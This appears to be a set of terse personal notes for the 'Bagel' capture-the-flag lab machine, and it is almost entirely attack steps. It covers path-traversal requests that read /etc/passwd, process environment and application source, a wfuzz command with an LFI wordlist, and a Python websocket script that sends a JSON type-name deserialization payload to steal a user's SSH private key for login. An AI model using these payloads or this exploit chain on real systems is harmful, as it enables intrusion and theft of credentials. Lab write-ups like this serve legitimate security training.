Bagel:

Burpsuite

GET /?page=../../../../../../etc/passwd

wfuzz -c -w LFI-LFISuite-pathtotest-huge.txt --hw 0 http://bagel.htb:8000/?page=../../../../../../../FUZZ

GET /?page=../../../../../../self/proc/environ

PID:890

GET /?page=../../../../../../../../../../../../proc/890/cmdline

python3 /home/developer/app/app.py

GET /?page=../../../../../../../../../../../../home/developer/app/app.py

https://www.newtonsoft.com/json/help/html/T_Newtonsoft_Json_TypeNameHandling.htm

"$type": "NameSpace.TypeName, AssemblyName" ,"ReadFile":"../../../../../../home/phil/.ssh/id_rsa"}

order =  { "RemoveOrder" : {"$type":"bagel_server.File, bagel", "ReadFile":"../../../../../../home/phil/.ssh/id_rsa"}}

python3 original.py

#!/usr/bin/python3

import websocket, json

ws = websocket.WebSocket()

ws.connect("ws://10.129.23.1:5000/")

order =  { "RemoveOrder" : {"$type":"bagel_server.File, bagel", "ReadFile":"../../../../../../home/phil/.ssh/id_rsa"}}
data = str(json.dumps(order))

ws.send(data)

result = ws.recv()
print(result) 


read ssh keys and ssh -i id_rsa login for foothold







